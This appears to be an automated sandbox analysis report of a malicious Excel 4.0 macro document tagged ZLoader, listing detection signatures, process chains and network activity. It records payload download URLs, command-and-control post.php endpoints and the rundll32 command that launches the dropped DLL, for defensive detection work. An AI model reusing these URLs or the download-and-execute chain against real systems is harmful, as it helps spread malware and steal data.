Play interactive tour

Edit tour

Analysis Report case (1057).xls

Overview

General Information

Sample Name:	case (1057).xls
Analysis ID:	344667
MD5:	cbc37bc9a7ec9836c033708d090db81c
SHA1:	a1fbde54662fb5cdb677f5841a3603df30345108
SHA256:	95e0295b15b7c624febe347f44747dada5cb1fc79b73561b3153af81b351a8de
Tags:	xlsZLoader
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malicious Excel 4.0 Macro

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Contains functionality to inject code into remote processes

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Found abnormal large hidden Excel 4.0 Macro sheet

Found malicious URLs in unpacked macro 4.0 sheet

Found obfuscated Excel 4.0 Macro

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Yara detected hidden Macro 4.0 in Excel

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the product ID of Windows

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 2056 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

rundll32.exe (PID: 552 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 1776 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)

msiexec.exe (PID: 2740 cmdline: msiexec.exe MD5: 4315D6ECAE85024A0567DF2CB253B7B0)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
case (1057).xls	JoeSecurity_HiddenMacro	Yara detected hidden Macro 4.0 in Excel	Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2056, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, ProcessId: 552

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Source: 4.2.rundll32.exe.440000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen2
Source: 5.2.msiexec.exe.d0000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen2

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown	HTTPS traffic detected: 172.67.150.228:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.44.135:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.198.109:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.73.69:443 -> 192.168.2.22:49170 version: TLS 1.2

Binary contains paths to debug symbols

Show sources

Source:

Binary string: c:\PlanetAllow\OpenRoll\cellNumeral\money.pdb source: msiexec.exe, 00000005.00000003.2174110786.0000000002AF0000.00000004.00000001.sdmp, doa.dll.5.dr

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\ProgramData\formnet.dll			Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: scfrd[1].dll.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then push 0000000Ah	4_2_0044D830
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then mov eax, dword ptr [edi-08h]	4_2_00458830
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then add esi, 02h	4_2_0045CE40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then push 00000000h	4_2_0045DA70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then push 0000000Ah	5_2_000DD830
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov eax, dword ptr [edi-08h]	5_2_000E8830
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then add esi, 02h	5_2_000ECE40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then push 00000000h	5_2_000EDA70

Source: global traffic

DNS query: name: rnollg.com

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 172.67.150.228:443

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 172.67.150.228:443

Networking:

Found malicious URLs in unpacked macro 4.0 sheet

Show sources

Source: before.1.0.0.sheet.csv_unpack

Macro 4.0 Deobfuscator: https://rnollg.com/kev/scfrd.dll

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 5_2_000D1AF0 InternetReadFile,

5_2_000D1AF0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ

Jump to behavior

Source: msiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 00000003.00000002.2169682622.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169237640.0000000001EB0000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: msiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: rnollg.com

Source: msiexec.exe, 00000005.00000003.2180098839.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: Https://homesoapmolds.com/post.php
Source: msiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmp	String found in binary or memory: http://cacerts.digicert.com/C
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: msiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/Cl
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: msiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmp	String found in binary or memory: http://crl4.digice
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
Source: msiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0K
Source: rundll32.exe, 00000003.00000002.2169682622.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169237640.0000000001EB0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2169682622.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169237640.0000000001EB0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2169819479.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169401108.0000000002097000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2169819479.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169401108.0000000002097000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: msiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicer
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: msiexec.exe, 00000005.00000002.2363950897.0000000000970000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2169819479.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169401108.0000000002097000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2169819479.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169401108.0000000002097000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: 0DEE0000.0.dr	String found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)
Source: case (1057).xls	String found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~
Source: msiexec.exe, 00000005.00000002.2363950897.0000000000970000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: msiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com/CPS0v
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rundll32.exe, 00000003.00000002.2169682622.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169237640.0000000001EB0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2169819479.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169401108.0000000002097000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2169682622.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169237640.0000000001EB0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000002.2169237640.0000000001EB0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: msiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmp	String found in binary or memory: https://gadgetswolf.com/
Source: msiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmp	String found in binary or memory: https://gadgetswolf.com/post.php
Source: msiexec.exe, 00000005.00000002.2364998565.0000000002DD0000.00000004.00000001.sdmp	String found in binary or memory: https://govemedico.tk/
Source: msiexec.exe, 00000005.00000002.2364998565.0000000002DD0000.00000004.00000001.sdmp	String found in binary or memory: https://govemedico.tk/_u
Source: msiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: https://govemedico.tk/post.php
Source: msiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: https://govemedico.tk/post.php.u
Source: msiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: https://govemedico.tk/post.phpc
Source: msiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: https://homesoapmolds.com/
Source: msiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: https://homesoapmolds.com/?p
Source: msiexec.exe, 00000005.00000003.2181370772.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: https://homesoapmolds.com/post.php
Source: msiexec.exe, 00000005.00000003.2180098839.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.clou
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: before.1.0.0.sheet.csv_unpack	String found in binary or memory: https://rnollg.com/kev/scfrd.dll
Source: case (1057).xls, 0DEE0000.0.dr	String found in binary or memory: https://rnollg.com/kev/scfrd.dll$8
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: msiexec.exe, 00000005.00000002.2363894570.00000000005B8000.00000004.00000020.sdmp	String found in binary or memory: https://www.digicert.com/C
Source: msiexec.exe, 00000005.00000003.2177601344.0000000000606000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443

Source: unknown	HTTPS traffic detected: 172.67.150.228:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.44.135:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.198.109:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.73.69:443 -> 192.168.2.22:49170 version: TLS 1.2

System Summary:

Found malicious Excel 4.0 Macro

Show sources

Source: case (1057).xls

Initial sample: URLDownloadToFileA

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4

Screenshot OCR: Enable Content X J5 - "- jR V \ A B C D E F G H I K L M N O P Q R S T 1 ' Cjdigicert' 3 ,

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: case (1057).xls	Initial sample: CALL
Source: case (1057).xls	Initial sample: CALL

Found abnormal large hidden Excel 4.0 Macro sheet

Show sources

Source: case (1057).xls

Initial sample: Sheet size: 503434

Found obfuscated Excel 4.0 Macro

Show sources

Source: case (1057).xls

Initial sample: High usage of CHAR() function: 147

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\ProgramData\formnet.dll			Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00449C60	4_2_00449C60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00449A60	4_2_00449A60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0045DA70	4_2_0045DA70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00443A30	4_2_00443A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00455BF0	4_2_00455BF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0050D806	4_2_0050D806
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0050F8FD	4_2_0050F8FD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0050D2C4	4_2_0050D2C4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0050BB6E	4_2_0050BB6E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0050DD48	4_2_0050DD48
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000D9C60	5_2_000D9C60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000D3A30	5_2_000D3A30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000D9A60	5_2_000D9A60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000EDA70	5_2_000EDA70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000E5BF0	5_2_000E5BF0

Source: Joe Sandbox View	Dropped File: C:\ProgramData\formnet.dll 0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll 0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890

Source: doa.dll.5.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: rundll32.exe, 00000003.00000002.2169682622.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2169237640.0000000001EB0000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.expl.evad.winXLS@7/12@4/4

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 5_2_000E9C90 AdjustTokenPrivileges,

5_2_000E9C90

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_004569A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,

4_2_004569A0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\0DEE0000

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{6564EBFF-51EC-A92E-3E66-73D0C2BEFC46}
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{451CDBFF-61EC-8956-3E66-73D0C2BEFC46}
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{F5F5D963-6370-39BF-3E66-73D0C2BEFC46}

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDDB1.tmp

Jump to behavior

Source: case (1057).xls

OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
Source: unknown	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: c:\PlanetAllow\OpenRoll\cellNumeral\money.pdb source: msiexec.exe, 00000005.00000003.2174110786.0000000002AF0000.00000004.00000001.sdmp, doa.dll.5.dr

Source: case (1057).xls

Initial sample: OLE summary lastprinted = 2021-01-26 16:17:13

Source: case (1057).xls

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_0044D830 LoadLibraryA,GetProcAddress,

4_2_0044D830

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0046D1F2 push dword ptr [ecx]; iretd	4_2_0046D1F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0046E9FA push esi; retf	4_2_0046EABE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0046EA51 push esi; retf	4_2_0046EABE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00469A5D push ebp; iretd	4_2_00469AEF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_004682EB push eax; ret	4_2_0046834A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_005093ED push ecx; ret	4_2_00509400
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0046B56F push esp; ret	4_2_0046B581
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0046B700 push ss; ret	4_2_0046B735
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00522B73 push esi; ret	4_2_00522B75

Persistence and Installation Behavior:

Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Yzub\doa.dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\ProgramData\formnet.dll	Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\ProgramData\formnet.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
